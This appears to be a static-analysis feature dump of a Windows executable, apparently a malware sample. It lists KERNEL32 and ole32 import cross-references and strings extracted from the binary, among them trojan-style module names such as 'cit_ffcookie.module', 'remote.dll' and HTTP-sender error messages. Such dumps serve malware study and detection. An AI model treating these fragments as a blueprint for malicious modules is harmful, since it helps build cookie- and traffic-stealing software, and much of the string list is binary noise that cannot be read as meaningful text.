sub.KERNEL32.dll_RtlCaptureContext_824 sym.imp.KERNEL32.dll_RtlCaptureContext
sub.KERNEL32.dll_RtlCaptureContext_fbc sym.imp.KERNEL32.dll_RtlCaptureContext
sub.KERNEL32.dll_RtlCaptureContext_f34 sym.imp.KERNEL32.dll_RtlCaptureContext
sub.KERNEL32.dll_RtlCaptureContext_794 sym.imp.KERNEL32.dll_RtlCaptureContext
sub.KERNEL32.dll_RtlCaptureContext_824 sym.imp.KERNEL32.dll_RtlLookupFunctionEntry
sub.KERNEL32.dll_RtlCaptureContext_f34 sym.imp.KERNEL32.dll_RtlLookupFunctionEntry
sub.KERNEL32.dll_RtlCaptureContext_fbc sym.imp.KERNEL32.dll_RtlLookupFunctionEntry
sub.KERNEL32.dll_RtlCaptureContext_794 sym.imp.KERNEL32.dll_RtlLookupFunctionEntry
sub.KERNEL32.dll_RtlCaptureContext_824 sym.imp.KERNEL32.dll_RtlLookupFunctionEntry
sub.KERNEL32.dll_RtlCaptureContext_fbc sym.imp.KERNEL32.dll_RtlLookupFunctionEntry
sub.KERNEL32.dll_RtlCaptureContext_f34 sym.imp.KERNEL32.dll_RtlLookupFunctionEntry
sub.KERNEL32.dll_RtlCaptureContext_794 sym.imp.KERNEL32.dll_RtlLookupFunctionEntry
sub.KERNEL32.dll_RtlCaptureContext_824 sym.imp.KERNEL32.dll_RtlVirtualUnwind
sub.KERNEL32.dll_RtlCaptureContext_f34 sym.imp.KERNEL32.dll_RtlVirtualUnwind
sub.KERNEL32.dll_RtlCaptureContext_fbc sym.imp.KERNEL32.dll_RtlVirtualUnwind
sub.KERNEL32.dll_RtlCaptureContext_794 sym.imp.KERNEL32.dll_RtlVirtualUnwind
sub.KERNEL32.dll_RtlCaptureContext_824 sym.imp.KERNEL32.dll_RtlVirtualUnwind
sub.KERNEL32.dll_RtlCaptureContext_fbc sym.imp.KERNEL32.dll_RtlVirtualUnwind
sub.KERNEL32.dll_RtlCaptureContext_f34 sym.imp.KERNEL32.dll_RtlVirtualUnwind
sub.KERNEL32.dll_RtlCaptureContext_794 sym.imp.KERNEL32.dll_RtlVirtualUnwind
sub.KERNEL32.dll_RtlCaptureContext_824 sym.imp.KERNEL32.dll_UnhandledExceptionFilter
loc.140007bb8 sym.imp.KERNEL32.dll_UnhandledExceptionFilter
sub.KERNEL32.dll_RtlCaptureContext_794 sym.imp.KERNEL32.dll_UnhandledExceptionFilter
sub.KERNEL32.dll_RtlCaptureContext_824 sym.imp.KERNEL32.dll_UnhandledExceptionFilter
loc.140007bb8 sym.imp.KERNEL32.dll_UnhandledExceptionFilter
sub.KERNEL32.dll_RtlCaptureContext_794 sym.imp.KERNEL32.dll_UnhandledExceptionFilter
loc.140008a30 sym.imp.KERNEL32.dll_SetUnhandledExceptionFilter
sub.KERNEL32.dll_RtlCaptureContext_824 sym.imp.KERNEL32.dll_SetUnhandledExceptionFilter
loc.140007bb8 sym.imp.KERNEL32.dll_SetUnhandledExceptionFilter
sub.KERNEL32.dll_RtlCaptureContext_794 sym.imp.KERNEL32.dll_SetUnhandledExceptionFilter
sub.KERNEL32.dll_RtlCaptureContext_824 sym.imp.KERNEL32.dll_SetUnhandledExceptionFilter
loc.140007bb8 sym.imp.KERNEL32.dll_SetUnhandledExceptionFilter
loc.140008a30 sym.imp.KERNEL32.dll_SetUnhandledExceptionFilter
sub.KERNEL32.dll_RtlCaptureContext_794 sym.imp.KERNEL32.dll_SetUnhandledExceptionFilter
loc.140007bb8 sym.imp.KERNEL32.dll_GetCurrentProcess
sub.KERNEL32.dll_ExitProcess_718 sym.imp.KERNEL32.dll_GetCurrentProcess
loc.14003b400 sym.imp.KERNEL32.dll_GetCurrentProcess
loc.140007bb8 sym.imp.KERNEL32.dll_GetCurrentProcess
loc.14003b400 sym.imp.KERNEL32.dll_GetCurrentProcess
sub.KERNEL32.dll_ExitProcess_718 sym.imp.KERNEL32.dll_GetCurrentProcess
loc.140007bb8 sym.imp.KERNEL32.dll_TerminateProcess
loc.14003b400 sym.imp.KERNEL32.dll_TerminateProcess
sub.KERNEL32.dll_ExitProcess_718 sym.imp.KERNEL32.dll_TerminateProcess
loc.140007bb8 sym.imp.KERNEL32.dll_TerminateProcess
loc.14003b400 sym.imp.KERNEL32.dll_TerminateProcess
sub.KERNEL32.dll_ExitProcess_718 sym.imp.KERNEL32.dll_TerminateProcess
sub.KERNEL32.dll_IsProcessorFeaturePresent_4e0 sym.imp.KERNEL32.dll_IsProcessorFeaturePresent
sub.KERNEL32.dll_IsProcessorFeaturePresent_4e0 sym.imp.KERNEL32.dll_IsProcessorFeaturePresent
loc.140008650 sym.imp.KERNEL32.dll_QueryPerformanceCounter
loc.140008650 sym.imp.KERNEL32.dll_QueryPerformanceCounter
loc.140008650 sym.imp.KERNEL32.dll_GetCurrentProcessId
loc.140008650 sym.imp.KERNEL32.dll_GetCurrentProcessId
loc.140008650 sym.imp.KERNEL32.dll_GetCurrentThreadId
loc.140008650 sym.imp.KERNEL32.dll_GetCurrentThreadId
loc.140008650 sym.imp.KERNEL32.dll_GetSystemTimeAsFileTime
loc.140008650 sym.imp.KERNEL32.dll_GetSystemTimeAsFileTime
loc.140008748 sym.imp.KERNEL32.dll_InitializeSListHead
loc.140008748 sym.imp.KERNEL32.dll_InitializeSListHead
loc.140008974 sym.imp.KERNEL32.dll_GetStartupInfoW
sub.KERNEL32.dll_GetStartupInfoW_320 sym.imp.KERNEL32.dll_GetStartupInfoW
loc.140008974 sym.imp.KERNEL32.dll_GetStartupInfoW
sub.KERNEL32.dll_GetStartupInfoW_320 sym.imp.KERNEL32.dll_GetStartupInfoW
sub.KERNEL32.dll_GetModuleHandleW_379 sym.imp.KERNEL32.dll_GetModuleHandleW
sub.KERNEL32.dll_GetModuleHandleW_c58 sym.imp.KERNEL32.dll_GetModuleHandleW
sub.KERNEL32.dll_GetModuleHandleW_379 sym.imp.KERNEL32.dll_GetModuleHandleW
sub.KERNEL32.dll_GetModuleHandleW_c58 sym.imp.KERNEL32.dll_GetModuleHandleW
sub.api_ms_win_core_registry_l1_1_0.dll_b6c sym.imp.KERNEL32.dll_GetLastError
sub.api_ms_win_core_registry_l1_1_0.dll_b6c sym.imp.KERNEL32.dll_GetLastError
sub.KERNEL32.dll_GetLastError_16b sym.imp.KERNEL32.dll_GetLastError
sub.KERNEL32.dll_GetProcAddress_6dc sym.imp.KERNEL32.dll_GetLastError
loc.14003792c sym.imp.KERNEL32.dll_GetLastError
sub.KERNEL32.dll_GetLastError_f37 sym.imp.KERNEL32.dll_GetLastError
sub.KERNEL32.dll_GetLastError_9c4 sym.imp.KERNEL32.dll_GetLastError
sub.KERNEL32.dll_GetProcAddress_230 sym.imp.KERNEL32.dll_GetLastError
sub.KERNEL32.dll_GetConsoleCP_6e0 sym.imp.KERNEL32.dll_GetLastError
sub.KERNEL32.dll_WriteFile_ad8 sym.imp.KERNEL32.dll_GetLastError
sub.KERNEL32.dll_WriteFile_c20 sym.imp.KERNEL32.dll_GetLastError
sub.KERNEL32.dll_WideCharToMultiByte_d84 sym.imp.KERNEL32.dll_GetLastError
sub.KERNEL32.dll_SetFilePointerEx_708 sym.imp.KERNEL32.dll_GetLastError
sub.KERNEL32.dll_SetFilePointerEx_7c8 sym.imp.KERNEL32.dll_GetLastError
sub.KERNEL32.dll_GetLastError_16b sym.imp.KERNEL32.dll_GetLastError
sub.KERNEL32.dll_GetLastError_9c4 sym.imp.KERNEL32.dll_GetLastError
loc.14003792c sym.imp.KERNEL32.dll_GetLastError
sub.api_ms_win_core_registry_l1_1_0.dll_b6c sym.imp.KERNEL32.dll_GetLastError
sub.api_ms_win_core_registry_l1_1_0.dll_b6c sym.imp.KERNEL32.dll_GetLastError
sub.KERNEL32.dll_GetProcAddress_6dc sym.imp.KERNEL32.dll_GetLastError
sub.KERNEL32.dll_GetLastError_f37 sym.imp.KERNEL32.dll_GetLastError
sub.KERNEL32.dll_GetProcAddress_230 sym.imp.KERNEL32.dll_GetLastError
sub.KERNEL32.dll_SetFilePointerEx_708 sym.imp.KERNEL32.dll_GetLastError
sub.KERNEL32.dll_GetConsoleCP_6e0 sym.imp.KERNEL32.dll_GetLastError
sub.KERNEL32.dll_WriteFile_c20 sym.imp.KERNEL32.dll_GetLastError
sub.KERNEL32.dll_WideCharToMultiByte_d84 sym.imp.KERNEL32.dll_GetLastError
sub.KERNEL32.dll_WriteFile_ad8 sym.imp.KERNEL32.dll_GetLastError
sub.KERNEL32.dll_SetFilePointerEx_7c8 sym.imp.KERNEL32.dll_GetLastError
sub.KERNEL32.dll_VirtualQuery_518 sym.imp.KERNEL32.dll_HeapAlloc
sub.KERNEL32.dll_HeapAlloc_b2c sym.imp.KERNEL32.dll_HeapAlloc
sub.KERNEL32.dll_HeapAlloc_a31 sym.imp.KERNEL32.dll_HeapAlloc
sub.KERNEL32.dll_VirtualQuery_518 sym.imp.KERNEL32.dll_HeapAlloc
sub.KERNEL32.dll_HeapAlloc_b2c sym.imp.KERNEL32.dll_HeapAlloc
sub.KERNEL32.dll_HeapAlloc_a31 sym.imp.KERNEL32.dll_HeapAlloc
sub.KERNEL32.dll_MultiByteToWideChar_610 sym.imp.KERNEL32.dll_WideCharToMultiByte
sub.KERNEL32.dll_VirtualQuery_518 sym.imp.KERNEL32.dll_HeapFree
loc.14003792c sym.imp.KERNEL32.dll_HeapFree
sub.KERNEL32.dll_VirtualQuery_518 sym.imp.KERNEL32.dll_HeapFree
loc.14003792c sym.imp.KERNEL32.dll_HeapFree
sub.KERNEL32.dll_VirtualQuery_518 sym.imp.KERNEL32.dll_GetProcessHeap
sub.KERNEL32.dll_VirtualQuery_518 sym.imp.KERNEL32.dll_GetProcessHeap
sub.KERNEL32.dll_VirtualQuery_518 sym.imp.KERNEL32.dll_GetProcessHeap
sub.KERNEL32.dll_VirtualQuery_518 sym.imp.KERNEL32.dll_GetProcessHeap
sub.KERNEL32.dll_VirtualQuery_518 sym.imp.KERNEL32.dll_VirtualQuery
sub.KERNEL32.dll_VirtualQuery_518 sym.imp.KERNEL32.dll_VirtualQuery
sub.KERNEL32.dll_VirtualQuery_518 sym.imp.KERNEL32.dll_GetProcAddress
sub.api_ms_win_core_registry_l1_1_0.dll_b6c sym.imp.KERNEL32.dll_FreeLibrary
sub.api_ms_win_core_registry_l1_1_0.dll_b6c sym.imp.KERNEL32.dll_FreeLibrary
sub.KERNEL32.dll_GetProcAddress_6dc sym.imp.KERNEL32.dll_FreeLibrary
sub.KERNEL32.dll_FreeLibrary_40f sym.imp.KERNEL32.dll_FreeLibrary
sub.KERNEL32.dll_GetModuleHandleExW_820 sym.imp.KERNEL32.dll_FreeLibrary
sub.KERNEL32.dll_GetProcAddress_230 sym.imp.KERNEL32.dll_FreeLibrary
sub.KERNEL32.dll_FreeLibrary_40f sym.imp.KERNEL32.dll_FreeLibrary
sub.api_ms_win_core_registry_l1_1_0.dll_b6c sym.imp.KERNEL32.dll_FreeLibrary
sub.api_ms_win_core_registry_l1_1_0.dll_b6c sym.imp.KERNEL32.dll_FreeLibrary
sub.KERNEL32.dll_GetProcAddress_6dc sym.imp.KERNEL32.dll_FreeLibrary
sub.KERNEL32.dll_GetModuleHandleExW_820 sym.imp.KERNEL32.dll_FreeLibrary
sub.KERNEL32.dll_GetProcAddress_230 sym.imp.KERNEL32.dll_FreeLibrary
sub.api_ms_win_core_registry_l1_1_0.dll_b6c sym.imp.KERNEL32.dll_GetProcAddress
sub.api_ms_win_core_registry_l1_1_0.dll_b6c sym.imp.KERNEL32.dll_GetProcAddress
sub.api_ms_win_core_registry_l1_1_0.dll_b6c sym.imp.KERNEL32.dll_GetProcAddress
sub.KERNEL32.dll_VirtualQuery_518 sym.imp.KERNEL32.dll_GetProcAddress
sub.KERNEL32.dll_GetProcAddress_6dc sym.imp.KERNEL32.dll_GetProcAddress
sub.KERNEL32.dll_GetModuleHandleExW_820 sym.imp.KERNEL32.dll_GetProcAddress
sub.KERNEL32.dll_GetProcAddress_230 sym.imp.KERNEL32.dll_GetProcAddress
sub.KERNEL32.dll_VirtualQuery_518 sym.imp.KERNEL32.dll_GetProcAddress
sub.api_ms_win_core_registry_l1_1_0.dll_b6c sym.imp.KERNEL32.dll_GetProcAddress
sub.api_ms_win_core_registry_l1_1_0.dll_b6c sym.imp.KERNEL32.dll_GetProcAddress
sub.api_ms_win_core_registry_l1_1_0.dll_b6c sym.imp.KERNEL32.dll_GetProcAddress
sub.KERNEL32.dll_GetProcAddress_6dc sym.imp.KERNEL32.dll_GetProcAddress
sub.KERNEL32.dll_GetModuleHandleExW_820 sym.imp.KERNEL32.dll_GetProcAddress
sub.KERNEL32.dll_GetProcAddress_230 sym.imp.KERNEL32.dll_GetProcAddress
loc.14003792c sym.imp.KERNEL32.dll_HeapFree
sub.KERNEL32.dll_RtlUnwindEx_53a sym.imp.KERNEL32.dll_RtlUnwindEx
sub.KERNEL32.dll_RtlUnwindEx_53a sym.imp.KERNEL32.dll_RtlUnwindEx
loc.140009f0c sym.imp.KERNEL32.dll_GetModuleFileNameW
loc.140009f0c sym.imp.KERNEL32.dll_GetModuleFileNameW
loc.140009f1c sym.imp.KERNEL32.dll_LoadLibraryExW
sub.KERNEL32.dll_GetProcAddress_6dc sym.imp.KERNEL32.dll_LoadLibraryExW
sub.KERNEL32.dll_GetProcAddress_6dc sym.imp.KERNEL32.dll_LoadLibraryExW
sub.KERNEL32.dll_GetProcAddress_230 sym.imp.KERNEL32.dll_LoadLibraryExW
sub.KERNEL32.dll_GetProcAddress_230 sym.imp.KERNEL32.dll_LoadLibraryExW
loc.140009f1c sym.imp.KERNEL32.dll_LoadLibraryExW
sub.KERNEL32.dll_GetProcAddress_6dc sym.imp.KERNEL32.dll_LoadLibraryExW
sub.KERNEL32.dll_GetProcAddress_6dc sym.imp.KERNEL32.dll_LoadLibraryExW
sub.KERNEL32.dll_GetProcAddress_230 sym.imp.KERNEL32.dll_LoadLibraryExW
sub.KERNEL32.dll_GetProcAddress_230 sym.imp.KERNEL32.dll_LoadLibraryExW
sub.KERNEL32.dll_GetLastError_16b sym.imp.KERNEL32.dll_SetLastError
sub.KERNEL32.dll_GetLastError_f37 sym.imp.KERNEL32.dll_SetLastError
sub.KERNEL32.dll_GetLastError_f37 sym.imp.KERNEL32.dll_SetLastError
sub.KERNEL32.dll_GetLastError_9c4 sym.imp.KERNEL32.dll_SetLastError
sub.KERNEL32.dll_GetLastError_9c4 sym.imp.KERNEL32.dll_SetLastError
sub.KERNEL32.dll_GetLastError_16b sym.imp.KERNEL32.dll_SetLastError
sub.KERNEL32.dll_GetLastError_9c4 sym.imp.KERNEL32.dll_SetLastError
sub.KERNEL32.dll_GetLastError_9c4 sym.imp.KERNEL32.dll_SetLastError
sub.KERNEL32.dll_GetLastError_f37 sym.imp.KERNEL32.dll_SetLastError
sub.KERNEL32.dll_GetLastError_f37 sym.imp.KERNEL32.dll_SetLastError
loc.14000a300 sym.imp.KERNEL32.dll_EnterCriticalSection
loc.14003f878 sym.imp.KERNEL32.dll_EnterCriticalSection
loc.140041d74 sym.imp.KERNEL32.dll_EnterCriticalSection
loc.14003f878 sym.imp.KERNEL32.dll_EnterCriticalSection
loc.14000a300 sym.imp.KERNEL32.dll_EnterCriticalSection
loc.140041d74 sym.imp.KERNEL32.dll_EnterCriticalSection
loc.14000a364 sym.imp.KERNEL32.dll_LeaveCriticalSection
loc.14003f8dc sym.imp.KERNEL32.dll_LeaveCriticalSection
loc.14003f8dc sym.imp.KERNEL32.dll_LeaveCriticalSection
loc.14000a364 sym.imp.KERNEL32.dll_LeaveCriticalSection
sub.KERNEL32.dll_DeleteCriticalSection_40a sym.imp.KERNEL32.dll_DeleteCriticalSection
sub.KERNEL32.dll_DeleteCriticalSection_9c3 sym.imp.KERNEL32.dll_DeleteCriticalSection
sub.KERNEL32.dll_DeleteCriticalSection_40a sym.imp.KERNEL32.dll_DeleteCriticalSection
sub.KERNEL32.dll_DeleteCriticalSection_9c3 sym.imp.KERNEL32.dll_DeleteCriticalSection
sub.InitializeCriticalSectionEx_900 sym.imp.KERNEL32.dll_InitializeCriticalSectionAndSpinCount
sub.InitializeCriticalSectionEx_488 sym.imp.KERNEL32.dll_InitializeCriticalSectionAndSpinCount
sub.InitializeCriticalSectionEx_900 sym.imp.KERNEL32.dll_InitializeCriticalSectionAndSpinCount
sub.InitializeCriticalSectionEx_488 sym.imp.KERNEL32.dll_InitializeCriticalSectionAndSpinCount
sub.FlsAlloc_865 sym.imp.KERNEL32.dll_TlsAlloc
sub.FlsAlloc_edc sym.imp.KERNEL32.dll_TlsAlloc
sub.FlsAlloc_865 sym.imp.KERNEL32.dll_TlsAlloc
sub.FlsAlloc_edc sym.imp.KERNEL32.dll_TlsAlloc
sub.FlsGetValue_2e9 sym.imp.KERNEL32.dll_TlsGetValue
sub.FlsGetValue_bc1 sym.imp.KERNEL32.dll_TlsGetValue
sub.FlsGetValue_bc1 sym.imp.KERNEL32.dll_TlsGetValue
sub.FlsGetValue_2e9 sym.imp.KERNEL32.dll_TlsGetValue
sub.FlsSetValue_ff sym.imp.KERNEL32.dll_TlsSetValue
sub.FlsSetValue_dd8 sym.imp.KERNEL32.dll_TlsSetValue
sub.FlsSetValue_dd8 sym.imp.KERNEL32.dll_TlsSetValue
sub.FlsSetValue_ff sym.imp.KERNEL32.dll_TlsSetValue
sub.FlsFree_224 sym.imp.KERNEL32.dll_TlsFree
sub.FlsFree_ae sym.imp.KERNEL32.dll_TlsFree
sub.FlsFree_ae sym.imp.KERNEL32.dll_TlsFree
sub.FlsFree_224 sym.imp.KERNEL32.dll_TlsFree
sub.KERNEL32.dll_GetStdHandle_210 sym.imp.KERNEL32.dll_GetStdHandle
sub.KERNEL32.dll_GetStdHandle_448 sym.imp.KERNEL32.dll_GetStdHandle
sub.KERNEL32.dll_GetStdHandle_210 sym.imp.KERNEL32.dll_GetStdHandle
sub.KERNEL32.dll_GetStdHandle_448 sym.imp.KERNEL32.dll_GetStdHandle
sub.KERNEL32.dll_GetModuleFileNameA_a7c sym.imp.KERNEL32.dll_GetModuleFileNameA
sub.KERNEL32.dll_GetModuleFileNameA_a7c sym.imp.KERNEL32.dll_GetModuleFileNameA
sub.KERNEL32.dll_ExitProcess_718 sym.imp.KERNEL32.dll_ExitProcess
sub.KERNEL32.dll_ExitProcess_718 sym.imp.KERNEL32.dll_ExitProcess
sub.KERNEL32.dll_GetModuleHandleExW_820 sym.imp.KERNEL32.dll_GetModuleHandleExW
sub.KERNEL32.dll_GetModuleHandleExW_820 sym.imp.KERNEL32.dll_GetModuleHandleExW
sub.KERNEL32.dll_GetACP_541 sym.imp.KERNEL32.dll_GetACP
sub.KERNEL32.dll_GetACP_910 sym.imp.KERNEL32.dll_GetACP
sub.KERNEL32.dll_GetACP_29c sym.imp.KERNEL32.dll_GetACP
sub.KERNEL32.dll_GetLocaleInfoW_30 sym.imp.KERNEL32.dll_GetACP
sub.KERNEL32.dll_GetACP_541 sym.imp.KERNEL32.dll_GetACP
sub.KERNEL32.dll_GetACP_910 sym.imp.KERNEL32.dll_GetACP
sub.KERNEL32.dll_GetACP_29c sym.imp.KERNEL32.dll_GetACP
sub.KERNEL32.dll_GetLocaleInfoW_30 sym.imp.KERNEL32.dll_GetACP
sub.KERNEL32.dll_IsDebuggerPresent_44a sym.imp.KERNEL32.dll_OutputDebugStringW
sub.KERNEL32.dll_IsDebuggerPresent_44a sym.imp.KERNEL32.dll_OutputDebugStringW
sub.KERNEL32.dll_IsDebuggerPresent_44a sym.imp.KERNEL32.dll_WaitForSingleObjectEx
sub.KERNEL32.dll_IsDebuggerPresent_44a sym.imp.KERNEL32.dll_WaitForSingleObjectEx
sub.KERNEL32.dll_IsDebuggerPresent_44a sym.imp.KERNEL32.dll_CreateThread
sub.KERNEL32.dll_IsDebuggerPresent_44a sym.imp.KERNEL32.dll_CreateThread
sub.KERNEL32.dll_FindFirstFileExA_b20 sym.imp.KERNEL32.dll_FindClose
sub.KERNEL32.dll_FindFirstFileExW_d38 sym.imp.KERNEL32.dll_FindClose
sub.KERNEL32.dll_FindFirstFileExA_b20 sym.imp.KERNEL32.dll_FindClose
sub.KERNEL32.dll_FindFirstFileExW_d38 sym.imp.KERNEL32.dll_FindClose
sub.KERNEL32.dll_FindFirstFileExA_b20 sym.imp.KERNEL32.dll_FindFirstFileExA
sub.KERNEL32.dll_FindFirstFileExA_b20 sym.imp.KERNEL32.dll_FindFirstFileExA
sub.KERNEL32.dll_FindFirstFileExW_d38 sym.imp.KERNEL32.dll_FindFirstFileExW
sub.KERNEL32.dll_FindFirstFileExW_d38 sym.imp.KERNEL32.dll_FindFirstFileExW
sub.KERNEL32.dll_FindFirstFileExA_b20 sym.imp.KERNEL32.dll_FindNextFileA
sub.KERNEL32.dll_FindFirstFileExA_b20 sym.imp.KERNEL32.dll_FindNextFileA
sub.KERNEL32.dll_FindFirstFileExW_d38 sym.imp.KERNEL32.dll_FindNextFileW
sub.KERNEL32.dll_FindFirstFileExW_d38 sym.imp.KERNEL32.dll_FindNextFileW
sub.KERNEL32.dll_IsValidCodePage_8fb sym.imp.KERNEL32.dll_IsValidCodePage
sub.KERNEL32.dll_IsValidCodePage_8fb sym.imp.KERNEL32.dll_IsValidCodePage
sub.KERNEL32.dll_GetACP_910 sym.imp.KERNEL32.dll_GetOEMCP
sub.KERNEL32.dll_GetACP_910 sym.imp.KERNEL32.dll_GetOEMCP
sub.KERNEL32.dll_GetCPInfo_a60 sym.imp.KERNEL32.dll_GetCPInfo
sub.KERNEL32.dll_IsValidCodePage_8fb sym.imp.KERNEL32.dll_GetCPInfo
sub.KERNEL32.dll_GetCPInfo_734 sym.imp.KERNEL32.dll_GetCPInfo
sub.KERNEL32.dll_IsValidCodePage_8fb sym.imp.KERNEL32.dll_GetCPInfo
sub.KERNEL32.dll_GetCPInfo_a60 sym.imp.KERNEL32.dll_GetCPInfo
sub.KERNEL32.dll_GetCPInfo_734 sym.imp.KERNEL32.dll_GetCPInfo
sub.KERNEL32.dll_GetEnvironmentStringsW_12c sym.imp.KERNEL32.dll_GetEnvironmentStringsW
sub.KERNEL32.dll_GetEnvironmentStringsW_7df sym.imp.KERNEL32.dll_GetEnvironmentStringsW
sub.KERNEL32.dll_GetEnvironmentStringsW_12c sym.imp.KERNEL32.dll_GetEnvironmentStringsW
sub.KERNEL32.dll_GetEnvironmentStringsW_7df sym.imp.KERNEL32.dll_GetEnvironmentStringsW
sub.KERNEL32.dll_GetEnvironmentStringsW_12c sym.imp.KERNEL32.dll_FreeEnvironmentStringsW
sub.KERNEL32.dll_GetEnvironmentStringsW_7df sym.imp.KERNEL32.dll_FreeEnvironmentStringsW
sub.KERNEL32.dll_GetEnvironmentStringsW_12c sym.imp.KERNEL32.dll_FreeEnvironmentStringsW
sub.KERNEL32.dll_GetEnvironmentStringsW_7df sym.imp.KERNEL32.dll_FreeEnvironmentStringsW
sub.KERNEL32.dll_SetEnvironmentVariableA_6bc sym.imp.KERNEL32.dll_SetEnvironmentVariableA
sub.KERNEL32.dll_SetEnvironmentVariableA_6bc sym.imp.KERNEL32.dll_SetEnvironmentVariableA
sub.KERNEL32.dll_SetEnvironmentVariableW_5ee sym.imp.KERNEL32.dll_SetEnvironmentVariableW
sub.KERNEL32.dll_SetEnvironmentVariableW_5ee sym.imp.KERNEL32.dll_SetEnvironmentVariableW
sub.CompareStringEx_db1 sym.imp.KERNEL32.dll_CompareStringW
sub.CompareStringEx_db1 sym.imp.KERNEL32.dll_CompareStringW
sub.KERNEL32.dll_ExitProcess_718 sym.imp.KERNEL32.dll_ExitProcess
sub.LCMapStringEx_427 sym.imp.KERNEL32.dll_LCMapStringW
sub.LCMapStringEx_427 sym.imp.KERNEL32.dll_LCMapStringW
sub.GetLocaleInfoEx_96a sym.imp.KERNEL32.dll_GetLocaleInfoW
sub.KERNEL32.dll_GetLocaleInfoW_30 sym.imp.KERNEL32.dll_GetLocaleInfoW
sub.KERNEL32.dll_GetLocaleInfoW_30 sym.imp.KERNEL32.dll_GetLocaleInfoW
sub.KERNEL32.dll_GetLocaleInfoW_140 sym.imp.KERNEL32.dll_GetLocaleInfoW
sub.GetLocaleInfoEx_96a sym.imp.KERNEL32.dll_GetLocaleInfoW
sub.KERNEL32.dll_GetLocaleInfoW_140 sym.imp.KERNEL32.dll_GetLocaleInfoW
sub.KERNEL32.dll_GetLocaleInfoW_30 sym.imp.KERNEL32.dll_GetLocaleInfoW
sub.KERNEL32.dll_GetLocaleInfoW_30 sym.imp.KERNEL32.dll_GetLocaleInfoW
sub.IsValidLocaleName_e0b sym.imp.KERNEL32.dll_IsValidLocale
sub.IsValidLocaleName_e0b sym.imp.KERNEL32.dll_IsValidLocale
sub.GetUserDefaultLocaleName_253 sym.imp.KERNEL32.dll_GetUserDefaultLCID
sub.GetUserDefaultLocaleName_253 sym.imp.KERNEL32.dll_GetUserDefaultLCID
loc.14003f9a0 sym.imp.KERNEL32.dll_EnumSystemLocalesW
sub.KERNEL32.dll_EnumSystemLocalesW_9c8 sym.imp.KERNEL32.dll_EnumSystemLocalesW
sub.KERNEL32.dll_EnumSystemLocalesW_ac8 sym.imp.KERNEL32.dll_EnumSystemLocalesW
loc.14003f9a0 sym.imp.KERNEL32.dll_EnumSystemLocalesW
sub.KERNEL32.dll_EnumSystemLocalesW_9c8 sym.imp.KERNEL32.dll_EnumSystemLocalesW
sub.KERNEL32.dll_EnumSystemLocalesW_ac8 sym.imp.KERNEL32.dll_EnumSystemLocalesW
sub.GetUserDefaultLocaleName_253 sym.imp.KERNEL32.dll_GetUserDefaultLCID
sub.KERNEL32.dll_GetStartupInfoW_320 sym.imp.KERNEL32.dll_GetFileType
sub.KERNEL32.dll_GetStdHandle_448 sym.imp.KERNEL32.dll_GetFileType
sub.KERNEL32.dll_GetStartupInfoW_320 sym.imp.KERNEL32.dll_GetFileType
sub.KERNEL32.dll_GetStdHandle_448 sym.imp.KERNEL32.dll_GetFileType
sub.LOL_12 sym.imp.ole32.dll_CoUninitialize
sub.LOL_12 sym.imp.ole32.dll_CoCreateInstance
sub.LOL_12 sym.imp.ole32.dll_CoCreateInstance
sub.LOL_12 sym.imp.ole32.dll_CoUninitialize
sub.LOL_12 sym.imp.ole32.dll_CoUninitialize
sub.LOL_12 sym.imp.ole32.dll_CoInitialize
sub.LOL_12 sym.imp.ole32.dll_CoInitialize

LANGUAGE:ENGLISH

Count Word
Unavailable profiler
Unavailable long
Unavailable mids
Unavailable nach
Unavailable help
Unavailable stud
Unavailable bool
Unavailable short
Unavailable operator
Unavailable mess
Unavailable cosh
Unavailable entia
Unavailable scram
Unavailable kernel
Unavailable turbo
Unavailable riff
Unavailable null
Unavailable char
Unavailable server
Unavailable double
Unavailable form
Unavailable gulp
Unavailable send
Unavailable junk
Unavailable void
Unavailable icon
Unavailable free
Unavailable crypt
Unavailable list
Unavailable warning
Unavailable main
Unavailable open
Unavailable cycle
Unavailable mask
Unavailable exit
Unavailable heart
Unavailable wake
Unavailable august
Unavailable sleep
Unavailable pulp
Unavailable baff
Unavailable conn
Unavailable plum
Unavailable tanh
Unavailable agen
Unavailable error
Unavailable cash
Unavailable ceil
Unavailable june
Unavailable march
Unavailable unknown
Unavailable sinh
Unavailable float
Unavailable starting
Unavailable floor
Unavailable system
Unavailable administrator
Unavailable volatile
Unavailable file

LANGUAGE:UNKNOWN

Count Word
Unavailable l$@i;
Unavailable interlockedpushentryslist
Unavailable t$03
Unavailable l$,vw
Unavailable *9jp
Unavailable ?qy^&
Unavailable aad,'
Unavailable ?>!t
Unavailable "rj-\
Unavailable *6h0
Unavailable fp!yv
Unavailable qtr.
Unavailable c00dc
Unavailable \$f^
Unavailable @ .k
Unavailable sunday
Unavailable jovbv
Unavailable pxdi
Unavailable fmod
Unavailable )z!px<d
Unavailable q*[zk
Unavailable -n6m
Unavailable .c/me
Unavailable 7x:#
Unavailable 1>?1
Unavailable 5#".
Unavailable wril
Unavailable 50#@l
Unavailable rmgin~%
Unavailable brtu
Unavailable 45_n
Unavailable egcp
Unavailable ht)i;
Unavailable ?q5w5b
Unavailable i_"e
Unavailable ;na}n<{
Unavailable e01wb
Unavailable vn@3oa
Unavailable .fy)
Unavailable p wh
Unavailable *buj
Unavailable tqfd9 tk
Unavailable o^ts
Unavailable d9cq
Unavailable (vc6.0) v1.0------------------
Unavailable yc!'
Unavailable f0@
Unavailable d$ d
Unavailable nj+y
Unavailable os/2
Unavailable t:e;
Unavailable l$0h
Unavailable j0ho
Unavailable `n;_
Unavailable wulx
Unavailable initializecriticalsectionex
Unavailable getcurrentprocessid
Unavailable /9$gz
Unavailable kb)#
Unavailable ib}&
Unavailable thenkz to dochtor x
Unavailable a(s+
Unavailable 11gx
Unavailable bjys.
Unavailable uxjt
Unavailable jt ^
Unavailable =m"n
Unavailable <n@4
Unavailable v`*:-
Unavailable 8-zc
Unavailable kl.dll
Unavailable e++,=
Unavailable uqle]]
Unavailable dvr3
Unavailable # exc: httpsender - cannot create post channel!# exc: httpsender - cannot create get channel!#ext_5 cannot create extchanneltoprocessthread!#ext_4 cannot create extchanneltoprocessthread!#exc_2 cannot create proctoext pipe!#exc_1 cannot create exttoproc pipe!#ext_3 cannot create process!<
Unavailable '-gt
Unavailable regclosekey
Unavailable i6~v
Unavailable lm35
Unavailable p\3n2&
Unavailable w{0&#
Unavailable 4lc?
Unavailable \x00remote.dll\x00\x00cgm_plugbase::\x00servicemain\x00_k_h_k_uh\x00\
Unavailable kfacquirespinlockhal.dllread_register_uchar@
Unavailable 6"xu'oh.
Unavailable `=ak}=%
Unavailable cit_ffcookie.modulecit_video.module
Unavailable new
Unavailable 8bfr
Unavailable 'fw?j
